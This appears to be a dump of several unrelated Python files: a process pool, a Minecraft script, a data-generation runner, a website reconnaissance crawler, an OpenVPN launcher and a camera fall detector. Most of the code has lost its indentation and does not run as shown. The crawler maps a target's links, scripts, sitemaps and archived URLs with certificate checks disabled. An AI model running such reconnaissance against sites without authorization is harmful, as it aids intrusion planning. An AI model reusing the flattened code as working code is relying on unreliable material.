while td._state == RUN:
exited_workers = ResilientZPool._join_exited_workers(pool._pool)
if len(exited_workers) > 0:
# create new workers when old workers exited
logger.debug("Exited workers %s", exited_workers)
ResilientZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
# resubmit tasks
logger.debug("Resubmitting tasks from failed workers")
for worker in exited_workers:
rid = pool._pid_to_rid[worker.pid]
# remove rid from active peers
pool._remove_peer(rid)
# Take care of pending tasks
tasks = pool._pending_table[rid]
logger.debug("Failed worker %s tasks %s", worker, tasks)
for _, task in tasks.items():
# resubmit each task
pool._task_put(task)
logger.debug("Resubmit task %s", task)
# Remove tasks from pending table
del pool._pending_table[rid]
logger.debug("Remove rid %s from pending table", rid)
time.sleep(0.5)
logger.debug("%s _handle_workers finished. Status is not RUN",
pool)
def terminate(self):
self._task_handler._state = TERMINATE
super(ResilientZPool, self).terminate()
def close(self):
logger.debug('closing pool %s', self)
if self._state == RUN:
self._state = CLOSE
self._worker_handler._state = CLOSE
for p in self._pool:
if hasattr(p, '_sentinel'):
p._state = CLOSE
#self._send_sentinels_to_workers()
#logger.debug("ResilientZPool _send_sentinels_to_workers: "
# "send to task handler")
self._task_put(None)
self._task_handler._state = CLOSE
def _send_sentinels_to_workers(self):
logger.debug("ResilientZPool _send_sentinels_to_workers: "
"send to workers")
data = pickle.dumps(None)
for ident in self.active_peer_list:
self._master_sock.send_multipart([ident, b"", data])
#Pool = ZPool
Pool = ResilientZPool
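# Since `Pool` aliases ResilientZPool, user code normally only needs the alias.
# A minimal sketch (not executed on import; assumes a Fiber backend and uses a
# hypothetical module-level helper so the target is picklable):
def _add_example(a, b):
    return a + b
def _resilient_pool_sketch():
    pool = Pool(processes=4)
    try:
        # starmap unpacks each tuple into positional arguments:
        # _add_example(1, 2) and _add_example(3, 4) run on remote workers.
        print(pool.starmap(_add_example, [(1, 2), (3, 4)]))  # [3, 7]
    finally:
        pool.close()
        pool.join()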
|
before.py
|
import math
import random
import subprocess
import time
from threading import Condition, Event, Thread
try:
from psonic import *
#from mcpi import block as block
except:
pass
BlocksList = [1,2,3,4,5,7,12,13,14,15,16,17,18,20,21,22,24,41,42,45,46,47,49]
WoolList = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
def PixelArt(N1,N2,N3,N4,N5,N6,N7,N8,
N9,N10,N11,N12,N13,N14,N15,N16,
N17,N18,N19,N20,N21,N22,N23,N24,
N25,N26,N27,N28,N29,N30,N31,N32,
N33,N34,N35,N36,N37,N38,N39,N40,
N41,N42,N43,N44,N45,N46,N47,N48,
N49,N50,N51,N52,N53,N54,N55,N56,
N57,N58,N59,N60,N61,N62,N63,N64):
row0 = [N1,N2,N3,N4,N5,N6,N7,N8]#1-8
row1 = [N9,N10,N11,N12,N13,N14,N15,N16]
row2 = [N17,N18,N19,N20,N21,N22,N23,N24]
row3 = [N25,N26,N27,N28,N29,N30,N31,N32]
row4 = [N33,N34,N35,N36,N37,N38,N39,N40]
row5 = [N41,N42,N43,N44,N45,N46,N47,N48]
row6 = [N49,N50,N51,N52,N53,N54,N55,N56]
row7 = [N57,N58,N59,N60,N61,N62,N63,N64]
List = [row7,row6,row5,row4,row3,row2,row1,row0]
return List
def PrintWall(ImportedList):
pos = mc.player.getTilePos()
mc.player.setPos(pos.x,pos.y,pos.z)
myList = ImportedList
for row in range (0,8):
for column in range (0,8):
mc.setBlock(pos.x+column,pos.y+row,pos.z-20,myList[row][column])
def distance_to_player(x, y, z):
global mc, math
pp = mc.player.getPos()
xd = x - pp.x
yd = y - pp.y
zd = z - pp.z
return math.sqrt((xd * xd) + (yd * yd) + (zd * zd))
def live_loop_1():
pass
def live_loop_2():
pass
def live_loop_3():
pass
def live_loop_4():
pass
def live_loop_1a(condition,stop_event):
while not stop_event.is_set():
with condition:
            condition.notify_all()  # Message to threads
live_loop_1()
def live_loop_2a(condition,stop_event):
while not stop_event.is_set():
with condition:
condition.wait() #Wait for message
live_loop_2()
def live_loop_3a(condition,stop_event):
while not stop_event.is_set():
with condition:
condition.wait() #Wait for message
live_loop_3()
def live_loop_4a(condition,stop_event):
while not stop_event.is_set():
with condition:
condition.wait() #Wait for message
live_loop_4()
condition = Condition()
stop_event = Event()
live_thread_1 = Thread(name='producer', target=live_loop_1a, args=(condition,stop_event))
live_thread_2 = Thread(name='consumer1', target=live_loop_2a, args=(condition,stop_event))
live_thread_3 = Thread(name='consumer2', target=live_loop_3a, args=(condition,stop_event))
live_thread_4 = Thread(name='consumer3', target=live_loop_4a, args=(condition,stop_event))
# live_thread_1.start()
# live_thread_2.start()
# live_thread_3.start()
# live_thread_4.start()
def buildPumpkin(x, y, z):
mc.setBlocks(x-2, y-2, z-2, x+2, y+2, z+2, 35, 1)
mc.setBlocks(x-1, y-1, z-1, x+1, y+1, z+1, 0, 1)
mc.setBlock(x-1, y+1, z-2, 0)
mc.setBlock(x+1, y+1, z-2, 0)
mc.setBlocks(x+1, y-1, z-2, x-1, y-1, z-2, 0, 0)
mc.setBlock(x-1, y+1, z+2, 0)
mc.setBlock(x+1, y+1, z+2, 0)
mc.setBlocks(x+1, y-1, z+2, x-1, y-1, z+2, 0, 0)
mc.setBlock(x-2, y+1, z-1, 0)
mc.setBlock(x-2, y+1, z+1, 0)
mc.setBlocks(x-2, y-1, z+1, x-2, y-1, z-1, 0, 0)
mc.setBlock(x+2, y+1, z-1, 0)
mc.setBlock(x+2, y+1, z+1, 0)
mc.setBlocks(x+2, y-1, z+1, x+2, y-1, z-1, 0, 0)
mc.setBlock(x, y+3, z, 35, 5)
old_print = print
# Overload print so that we can't hammer the standard output.
# Print is limited to 1 line every 1/10 seconds.
def print(*args):
old_print(*args)
time.sleep(0.10)
print()
print('[Starting]')
print()
|
run_new.py
|
# -*- coding: utf-8 -*-
# @Time : 2020/5/8 10:43
# @Author : liudongyang
# @FileName: run_new.py
# @Software: PyCharm
import sys
import os
import time
import zipfile
import datetime
from readConfig import RunConfig, Setting
config = RunConfig()
settings = Setting()
from task_schedule import main1, main8, main9
from loggers import LogInfo
loginfo = LogInfo()
log = loginfo.logger("DEBUG")
if sys.platform == 'linux':
os.chdir('/home/admin/make_data/tomysql/4v0')
zip_floder = config.get_linux_data_path()
if not os.path.exists(zip_floder):
os.makedirs(zip_floder, exist_ok=False)
elif sys.platform == 'win32':
zip_floder = config.get_win_data_path()
if not os.path.exists(zip_floder):
os.makedirs(zip_floder, exist_ok=False)
else:
zip_floder=os.getcwd()
current_path = os.getcwd()
def get_parm():
    with open(os.path.join(current_path, 'parm.txt'), 'r', encoding='utf-8') as f:
        res = f.read()
    parm = res.split(',')
    n = int(parm[0])
    t = int(parm[1])
    print('Start index: {}'.format(n))
    print('Trade date from parm file: {}'.format(t))
    return n, t
def updtae_parm(n, t):
with open(os.path.join(current_path, 'parm.txt'), 'w', encoding='utf-8') as f:
f.write("{},{}".format(n, t))
def zip_file(start_dir, date):
os.chdir(start_dir)
    # start_dir is the folder to compress
    file_news = '{}'.format(date) + '_1.zip'  # name of the resulting zip archive
print(file_news)
z = zipfile.ZipFile(file_news, 'w', zipfile.ZIP_DEFLATED)
for dir_path, dir_names, file_names in os.walk(start_dir):
        f_path = dir_path.replace(start_dir, '')  # important: without this replace, files are archived with paths starting from the root directory
        f_path = f_path and f_path + os.sep or ''  # archive the current folder and all the files it contains
# print('f_path', f_path)
for filename in file_names:
if date in filename and filename[-3:] == 'csv':
# print(filename)
z.write(os.path.join(dir_path, filename), f_path + filename)
# print('tt', os.path.join(dir_path, filename), f_path + filename)
                os.remove(os.path.join(dir_path, filename))
else:
print('-----------------')
print(filename)
z.close()
with open(os.path.join(start_dir,'{}'.format(date))+"_1.txt", 'w', encoding='utf-8') as f:
pass
return file_news
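# The replace()/f_path logic above simply builds archive names relative to
# start_dir. A minimal sketch of the same idea using os.path.relpath as an
# explicit arcname (illustrative only; this helper is not used by the script):
def _zip_folder_sketch(start_dir, out_name):
    with zipfile.ZipFile(out_name, 'w', zipfile.ZIP_DEFLATED) as z:
        for dir_path, dir_names, file_names in os.walk(start_dir):
            for filename in file_names:
                full_path = os.path.join(dir_path, filename)
                arcname = os.path.relpath(full_path, start_dir)  # path stored inside the zip
                z.write(full_path, arcname)
    return out_name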
def run1():
n, t = get_parm()
start_time = time.time()
# threads = []
# for count in range(10):
# t = Thread(target=main, args=(count*10, (count+1)*10))
# t.start()
# threads.append(t)
# for t in threads:
# t.join()
    # ------------------------- single-threaded
    # number of data rows per day
o = int(settings.data_num())
stif_num = int(settings.stif_num())
num_days = int(settings.num_days())
for m in range(num_days):
st = datetime.datetime.strptime(str(t), "%Y%m%d")
file_date_time = str(st)[:10]
stif_time = "{}100000".format(t)
main1(n, n + o, stif_time, file_date_time, stif_num)
# te()
n += o
t += 1
zip_file(zip_floder, file_date_time)
updtae_parm(n, t)
end_time = time.time()
print(end_time - start_time) # 13
def run2():
n, t = get_parm()
start_time = time.time()
# threads = []
# for count in range(10):
# t = Thread(target=main, args=(count*10, (count+1)*10))
# t.start()
# threads.append(t)
# for t in threads:
# t.join()
    # ------------------------- single-threaded
    # o: number of data rows per day
o = int(settings.data_num())
stif_num = int(settings.stif_num())
num_days = int(settings.num_days())
for m in range(num_days):
st = datetime.datetime.strptime(str(t), "%Y%m%d")
file_date_time = str(st)[:10]
stif_time = "{}100000".format(t)
main8(n, n + o, stif_time, file_date_time, stif_num)
n += o
t += 1
zip_file(zip_floder, file_date_time)
end_time = time.time()
print(end_time - start_time) # 13
updtae_parm(n, t)
if __name__ == "__main__":
run1()
# run2()
|
crawler.py
|
#!/usr/bin/env python3
import os
import re
import bs4
import lxml
import asyncio
import requests
import threading
import tldextract
from datetime import date
requests.packages.urllib3.disable_warnings()
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m' # white
Y = '\033[33m' # yellow
user_agent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
}
soup = ''
r_url = ''
sm_url = ''
total = []
r_total = []
sm_total = []
js_total = []
css_total = []
int_total = []
ext_total = []
img_total = []
js_crawl_total = []
sm_crawl_total = []
wayback_total = []
def crawler(target, output, data):
global soup, r_url, sm_url
print('\n\n' + Y + '[!]' + Y + ' Starting Crawler...' + W + '\n')
try:
rqst = requests.get(target, headers=user_agent, verify=False)
except Exception as e:
print(R + '[-] Exception : ' + C + str(e) + W)
exit()
sc = rqst.status_code
if sc == 200:
page = rqst.content
soup = bs4.BeautifulSoup(page, 'lxml')
ext = tldextract.extract(target)
hostname = '.'.join(part for part in ext if part)
protocol = target.split('://')
protocol = protocol[0]
r_url = protocol + '://' + hostname + '/robots.txt'
sm_url = protocol + '://' + hostname + '/sitemap.xml'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
tasks = asyncio.gather(
robots(target),
sitemap(),
css(target),
js(target),
internal_links(target),
external_links(target),
images(target),
sm_crawl(),
js_crawl(),
wayback(target))
loop.run_until_complete(tasks)
loop.close()
out(target, output, data)
else:
print (R + '[-]' + C + ' Status : ' + W + str(sc))
def url_filter(target):
global url
if all([url.startswith('/') == True, url.startswith('//') == False]):
url = target + url
else:
pass
if all([url.find('http://') == -1,
url.find('https://') == -1]):
url = url.replace('//', 'http://')
url = url.replace('../', target + '/')
url = url.replace('./', target + '/')
else:
pass
if all([url.find('//') == -1,
url.find('../') == -1,
url.find('./') == -1,
url.find('http://') == -1,
url.find('https://') == -1]):
url = target + '/' + url
else:
pass
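# url_filter() rewrites the module-global `url` in place, resolving it against
# `target`. The helper below is illustrative only (the crawler does not use it)
# and shows the effect on a single URL.
def _url_filter_demo(target, raw_url):
    global url
    url = raw_url
    url_filter(target)
    return url
# For target = 'http://example.com':
#   '/about'          -> 'http://example.com/about'        (site-relative path)
#   '//cdn.site/x.js' -> 'http://cdn.site/x.js'            (protocol-relative)
#   'img/logo.png'    -> 'http://example.com/img/logo.png' (bare relative path)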
async def wayback(target):
global wayback_total
print(Y + '[!]' + C + ' Requesting Wayback Machine' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
domain = domain + '/*'
#today = date.today().strftime("%Y%m%d")
#past = date.today() + relativedelta(months=-6)
#past = past.strftime("%Y%m%d")
curr_yr = date.today().year
last_yr = curr_yr - 1
wm_url = 'http://web.archive.org/cdx/search/cdx'
data= {
'url': domain,
'fl': 'original',
'fastLatest': 'true',
'from': '{}'.format(str(last_yr)),
'to': '{}'.format(str(curr_yr)),
'filter': 'statuscode:200'
}
try:
r = requests.get(wm_url, params=data)
r_sc = r.status_code
if r_sc == 200:
r_data = r.text
if len(r_data) != 0:
r_data = r_data.split('\n')
r_data = set(r_data)
print(G + '['.rjust(5, '.') + ' {} ]'.format(str(len(r_data))))
wayback_total.extend(r_data)
else:
print(R + '['.rjust(5, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(5, '.') + ' {} ]'.format(r_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e) + W)
async def robots(target):
global url, r_url, r_total
print(G + '[+]' + C + ' Looking for robots.txt' + W, end = '')
try:
r_rqst = requests.get(r_url, headers=user_agent, verify=False)
r_sc = r_rqst.status_code
if r_sc == 200:
print(G + '['.rjust(9, '.') + ' Found ]' + W)
print(G + '[+]' + C + ' Extracting robots Links', end = '')
r_page = r_rqst.text
r_scrape = r_page.split('\n')
for entry in r_scrape:
if (entry.find('Disallow') == 0 or
entry.find('Allow') == 0 or
entry.find('Sitemap') == 0):
url = entry.split(': ')
try:
url = url[1]
url = url.strip()
url_filter(target)
r_total.append(url)
if url.endswith('xml') == True:
sm_total.append(url)
except:
pass
r_total = set(r_total)
print(G + '['.rjust(8, '.') + ' {} ]'.format(str(len(r_total))))
elif r_sc == 404:
print(R + '['.rjust(9, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(9, '.') + ' {} ]'.format(r_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e) + W)
async def sitemap():
global url, sm_url, total, sm_total
print(G + '[+]' + C + ' Looking for sitemap.xml' + W, end = '')
try:
sm_rqst = requests.get(sm_url, headers=user_agent, verify=False)
sm_sc = sm_rqst.status_code
if sm_sc == 200:
print(G + '['.rjust(8, '.') + ' Found ]' + W)
print(G + '[+]' + C + ' Extracting sitemap Links', end = '')
sm_page = sm_rqst.content
sm_soup = bs4.BeautifulSoup(sm_page, 'xml')
links = sm_soup.find_all('loc')
for url in links:
url = url.get_text()
if url != None:
sm_total.append(url)
sm_total = set(sm_total)
print(G + '['.rjust(7, '.') + ' {} ]'.format(str(len(sm_total))))
elif sm_sc == 404:
print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
async def css(target):
global url, soup, total, css_total
print(G + '[+]' + C + ' Extracting CSS Links' + W, end = '')
css = soup.find_all('link')
for link in css:
url = link.get('href')
if url != None and '.css' in url:
url_filter(target)
css_total.append(url)
css_total = set(css_total)
print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(css_total))) + W)
async def js(target):
global url, total, js_total
print(G + '[+]' + C + ' Extracting Javascript Links' + W, end = '')
js = soup.find_all('script')
for link in js:
url = link.get('src')
if url != None and '.js' in url:
url_filter(target)
js_total.append(url)
js_total = set(js_total)
print(G + '['.rjust(4, '.') + ' {} ]'.format(str(len(js_total))))
async def internal_links(target):
global total, int_total
print(G + '[+]' + C + ' Extracting Internal Links' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
links = soup.find_all('a')
for link in links:
url = link.get('href')
if url != None:
if domain in url:
int_total.append(url)
int_total = set(int_total)
print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(int_total))))
async def external_links(target):
global total, ext_total
print(G + '[+]' + C + ' Extracting External Links' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
links = soup.find_all('a')
for link in links:
url = link.get('href')
if url != None:
if domain not in url and 'http' in url:
ext_total.append(url)
ext_total = set(ext_total)
print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(ext_total))))
async def images(target):
global url, total, img_total
print(G + '[+]' + C + ' Extracting Images' + W, end = '')
images = soup.find_all('img')
for link in images:
url = link.get('src')
if url != None and len(url) > 1:
url_filter(target)
img_total.append(url)
img_total = set(img_total)
print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(img_total))))
async def sm_crawl():
global sm_crawl_total
print(G + '[+]' + C + ' Crawling Sitemaps' + W, end = '')
threads = []
def fetch(site_url):
try:
sm_rqst = requests.get(site_url, headers=user_agent, verify=False)
sm_sc = sm_rqst.status_code
if sm_sc == 200:
sm_data = sm_rqst.content.decode()
sm_soup = bs4.BeautifulSoup(sm_data, 'xml')
links = sm_soup.find_all('loc')
for url in links:
url = url.get_text()
if url != None:
sm_crawl_total.append(url)
elif sm_sc == 404:
print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
for site_url in sm_total:
if site_url != sm_url:
if site_url.endswith('xml') == True:
t = threading.Thread(target=fetch, args=[site_url])
t.daemon = True
threads.append(t)
t.start()
for thread in threads:
thread.join()
sm_crawl_total = set(sm_crawl_total)
print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(sm_crawl_total))))
async def js_crawl():
global js_crawl_total
print(G + '[+]' + C + ' Crawling Javascripts' + W, end = '')
threads = []
def fetch(js_url):
try:
js_rqst = requests.get(js_url, headers=user_agent, verify=False)
js_sc = js_rqst.status_code
if js_sc == 200:
js_data = js_rqst.content.decode()
js_data = js_data.split(';')
for line in js_data:
if any(['http://' in line, 'https://' in line]):
found = re.findall(r'\"(http[s]?://.*?)\"', line)
for item in found:
if len(item) > 8:
js_crawl_total.append(item)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
for js_url in js_total:
t = threading.Thread(target=fetch, args=[js_url])
t.daemon = True
threads.append(t)
t.start()
for thread in threads:
thread.join()
js_crawl_total = set(js_crawl_total)
print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(js_crawl_total))))
def out(target, output, data):
global total
total.extend(r_total)
total.extend(sm_total)
total.extend(css_total)
total.extend(js_total)
total.extend(js_crawl_total)
total.extend(sm_crawl_total)
total.extend(int_total)
total.extend(ext_total)
total.extend(img_total)
total.extend(wayback_total)
total = set(total)
print('\n' + G + '[+]' + C + ' Total Unique Links Extracted : ' + W + str(len(total)))
if output != 'None':
print()
if len(total) != 0:
data['module-Crawler'] = {'Total Unique Links Extracted': str(len(total))}
try:
data['module-Crawler'].update({'Title':soup.title.string})
except AttributeError:
                data['module-Crawler'].update({'Title': None})
data['module-Crawler'].update(
{
'Count ( Robots )': str(len(r_total)),
'Count ( Sitemap )': str(len(sm_total)),
'Count ( CSS )': str(len(css_total)),
'Count ( JS )': str(len(js_total)),
'Count ( Links in JS )': str(len(js_crawl_total)),
'Count ( Links in Sitemaps )': str(len(sm_crawl_total)),
'Count ( Internal )': str(len(int_total)),
'Count ( External )': str(len(ext_total)),
'Count ( Images )': str(len(img_total)),
'count ( Wayback Machine )': str(len(wayback_total)),
'Count ( Total )': str(len(total))
})
if len(r_total) != 0:
data['module-Crawler'].update({'Robots': list(r_total)})
if len(sm_total) != 0:
data['module-Crawler'].update({'Sitemaps': list(sm_total)})
if len(css_total) != 0:
data['module-Crawler'].update({'CSS': list(css_total)})
if len(js_total) != 0:
data['module-Crawler'].update({'Javascripts': list(js_total)})
if len(js_crawl_total) != 0:
data['module-Crawler'].update({'Links inside Javascripts': list(js_crawl_total)})
if len(sm_crawl_total) != 0:
data['module-Crawler'].update({'Links Inside Sitemaps': list(sm_crawl_total)})
if len(int_total) != 0:
data['module-Crawler'].update({'Internal Links': list(int_total)})
if len(ext_total) != 0:
data['module-Crawler'].update({'External Links': list(ext_total)})
if len(img_total) != 0:
data['module-Crawler'].update({'Images': list(img_total)})
if len(wayback_total) != 0:
data['module-Crawler'].update({'Wayback Machine': list(wayback_total)})
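# Illustrative entry point sketch (not executed on import). The target URL and
# the output label are placeholders; passing any output value other than the
# string 'None' makes out() populate the `data` dict.
def _crawler_demo():
    data = {}
    crawler('http://example.com', 'report', data)
    print(data.get('module-Crawler', {}))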
|
timeevent.py
|
import datetime
from utilities.date import *
from threading import Thread
class Alarm:
def __init__(self, timeStr, action, periodic=False):
self.time = dayTime(parseTime(timeStr))
self.periodic = periodic
self.action = action
self.over = False
self.thread = None
self.state = "pending"
def check(self, timeNow):
timeNow = dayTime(timeNow)
diff = int((self.time - timeNow).total_seconds())
if 0 > diff and self.state == "pending":
self.state = "active"
#self.thread = Thread(target=self.action, args=(self.finished,))
self.thread = Thread(target=self.action)
self.thread.start()
elif self.state == "active":
pass
if self.thread:
if self.state == "active" and not self.thread.is_alive():
#print "Thread finished"
self.state = "done"
return diff
def finished(self):
#print "callback"
if self.periodic and self.over:
self.over = False
"""
def getTimeStr(self):
return replaceDate(self.time).strftime("%H:%M")
"""
|
openvpn.py
|
import os
import time
import winreg as reg
import subprocess
from pathlib import Path
import sys
from threading import Thread, currentThread
import psutil
import socket
ADAPTER_KEY = r'SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}'
OpenVpnPath = "C:\\Program Files\\OpenVPN\\bin\\openvpn.exe"
ConfigPath = os.environ['USERPROFILE'] + "\\OpenVPN\\config"
ConnectionKey = "SYSTEM\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}"
### kill a process and its children (Mouhahaha !!)
def kill(proc_pid):
process = psutil.Process(proc_pid)
try:
for proc in process.children(recursive=True):
proc.kill()
except:
pass
process.kill()
### Get the gateway address of an interface
def getIpAddressGateway(family,interfaceName):
for interface, snics in psutil.net_if_addrs().items():
for snic in snics:
if snic.family == family and interface == interfaceName:
host = snic.address.split(".")
host[-1] = "1"
return ".".join(host)
### Execute the Openvpn command (use in a thread)
def VPNConnect(OpenVpnPath,componentId,TcpConf,UdpConf=None):
if UdpConf is None:
cmd = [OpenVpnPath,"--dev-node", componentId, "--config", TcpConf,"--route-nopull"]
else:
cmd = [OpenVpnPath,"--dev-node", componentId, "--config", TcpConf,"--config",UdpConf,"--route-nopull"]
prog = subprocess.Popen(cmd,stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
try:
# Get the credentials
fh = open("data/openVPNid.data", "r").read().splitlines()
login = fh[0]
password = fh[1]
except:
return
time.sleep(0.1)
prog.stdin.write(login.encode("utf-8"))
prog.stdin.flush()
time.sleep(0.1)
prog.stdin.write(password.encode("utf-8"))
prog.stdin.close()
t = currentThread()
while True:
line = prog.stdout.readline()
print(line)
if b'Initialization' in line:
print("Makeroute called")
makeRoute(componentId)
break
        if line == b'':
break
if b'Restart' in line:
t.do_run = False
break
time.sleep(0.2)
while getattr(t, "do_run", True):
prog.poll()
time.sleep(0.5)
print("stopped")
kill(prog.pid)
#def setAddress(componentId):
# cmd = ["netsh.exe","interface","ip","set","address","name="+componentId,"static",ip, mask, gateway]
# prog = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
### Add the route to connect to the vpn
def makeRoute(componentId):
gateway = getIpAddressGateway(socket.AF_INET,componentId)
cmd = ["route", "add", "0.0.0.0", "mask", "0.0.0.0", gateway, "metric", "1000"]
prog = subprocess.Popen(cmd)
### Add a vpn connection using the conf file. Returns a thread that runs the VPN
def mainVPN(ConfTcp,ConfUdp = None):
if not Path(OpenVpnPath).is_file():
raise ValueError("Openvpn not installed")
    key = None
    with reg.OpenKey(reg.HKEY_LOCAL_MACHINE, ADAPTER_KEY) as adapters:
try:
for i in range(10000):
key_name = reg.EnumKey(adapters, i)
with reg.OpenKey(adapters, key_name) as adapter:
try:
component_id = reg.QueryValueEx(adapter, 'ComponentId')[0]
if component_id == 'tap0901':
key = reg.QueryValueEx(adapter, 'NetCfgInstanceId')[0]
except :
pass
except:
pass
if key is None:
raise ValueError("TAP Windows not installed")
for proc in psutil.process_iter():
try:
process = psutil.Process(proc.pid)
pname = process.name()
if pname == "openvpn.exe" and process.parent().parent() == "python.exe":
kill(proc.pid)
except:
pass
regConnection = reg.OpenKey(reg.HKEY_LOCAL_MACHINE, ConnectionKey+"\\"+key+"\\Connection")
componentId = reg.QueryValueEx(regConnection, "name")[0]
print("RESULT: "+componentId)
if Path(ConfTcp).is_file():
if (ConfUdp is not None) and (Path(ConfUdp).is_file()):
thVPN = Thread(target=VPNConnect, args=(OpenVpnPath, componentId, ConfTcp, ConfUdp))
thVPN.start()
else:
thVPN = Thread(target=VPNConnect, args=(OpenVpnPath, componentId, ConfTcp,))
thVPN.start()
return (thVPN,componentId)
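# Illustrative usage sketch (not executed): start the VPN from a TCP config and
# stop it later by clearing the thread's `do_run` flag, which VPNConnect polls.
# The .ovpn file name below is a placeholder.
def _openvpn_demo():
    vpn_thread, adapter_name = mainVPN(ConfigPath + "\\client-tcp.ovpn")
    print("VPN running on adapter: " + adapter_name)
    time.sleep(60)
    vpn_thread.do_run = False  # VPNConnect sees this, exits its loop and kills openvpn.exe
    vpn_thread.join()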
|
fall_detection.py
|
import sys
sys.path.append('../')
sys.path.append('../TensorFlow-2.x-YOLOv3')
from yolov3.configs import *
from yolov3.utils import load_yolo_weights, image_preprocess, postprocess_boxes, nms, draw_bbox, read_class_names
from yolov3.yolov4 import Create_Yolo
import tensorflow as tf
import numpy as np
import os
from webAPI import WebAPI
import cv2
import time
import threading
import queue
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from utils import setup_tf_conf, get_latest_frame
setup_tf_conf()
# replace the following with your NVR IP address and port and user account
IP_ADDR = 'xxx.xxx.xxx.xxx'
PORT = 'xxxx'
ACCOUNT = 'xxxxxx'
PASSWORD = 'xxxxxx'
def check_fall(NUM_CLASS, class_ind, w, h):
return NUM_CLASS[class_ind] == 'person' and w > 1.8 * h
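# The heuristic above flags a detected "person" whose bounding box is much wider
# than it is tall (w > 1.8 * h), i.e. someone lying down. Worked examples with
# hypothetical boxes (COCO class index 0 is 'person'); not executed on import.
def _check_fall_examples():
    classes = {0: 'person'}
    assert check_fall(classes, 0, 200, 90) is True    # 200 > 1.8 * 90 = 162 -> likely a fall
    assert check_fall(classes, 0, 80, 180) is False   # taller than wide -> standing person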
def detect_fall(YoloV3, img, input_size=416, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
        raise ValueError('Invalid image!')
image_data = image_preprocess(np.copy(original_image), [
input_size, input_size])
image_data = tf.expand_dims(image_data, 0)
t1 = time.time()
pred_bbox = YoloV3.predict(image_data)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(
pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
ms = (t2 - t1) * 1000
fps = 1000 / ms
print('Time: {:.2f}ms, {:.1f} FPS'.format(ms, fps))
fall_bboxes = []
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
class_ind = int(bbox[5])
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
if check_fall(CLASSES, class_ind, x2-x1, y2-y1):
fall_bboxes.append(bbox)
if len(fall_bboxes) > 0:
image = draw_bbox(original_image, fall_bboxes,
rectangle_colors=rectangle_colors)
cv2.imwrite('fall-detection.jpg', image)
return True
else:
return False
def read_frame(q, rtsp):
stream = cv2.VideoCapture(rtsp)
while True:
ret, frame = stream.read()
if ret:
q.put(frame)
def process_frame(q, webapi, camera_id, yolo, classes, fall_label):
while True:
frame = get_latest_frame(q)
if detect_fall(yolo, frame, input_size=YOLO_INPUT_SIZE, CLASSES=classes, rectangle_colors=(255, 0, 0)):
print('Fall detect!')
webapi.start_action_rule_recording()
webapi.send_notification()
            # Wait for the Action Rule recording to finish starting.
            # Without this sleep, tags might be added to the previous recording.
time.sleep(1)
recordings = webapi.list_recordings([camera_id])
recording_ids = [recording['id'] for recording in recordings]
recording_id = recording_ids[0]
webapi.add_label_to_recording(recording_id, fall_label)
def main():
webapi = WebAPI(IP_ADDR, PORT, ACCOUNT, PASSWORD)
cameras = webapi.list_cameras()
camera_ids = [camera['id'] for camera in cameras]
# the last added camera in the Surveillance Station
camera_id = camera_ids[-1]
rtsp = webapi.get_liveview_rtsp(camera_id)
fall_label = webapi.create_recording_label('fall_event')
# Initialize fall detection model
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE)
load_yolo_weights(yolo, YOLO_V3_WEIGHTS) # use Darknet weights
classes = read_class_names(YOLO_COCO_CLASSES)
q = queue.Queue()
p1 = threading.Thread(target=read_frame, args=([q, rtsp]))
p2 = threading.Thread(target=process_frame,
args=([q, webapi, camera_id, yolo, classes, fall_label]))
p1.start()
p2.start()
p1.join()
p2.join()
webapi.logout()
if __name__ == '__main__':
main()
|
ptf_runner.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
# Copyright 2018-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
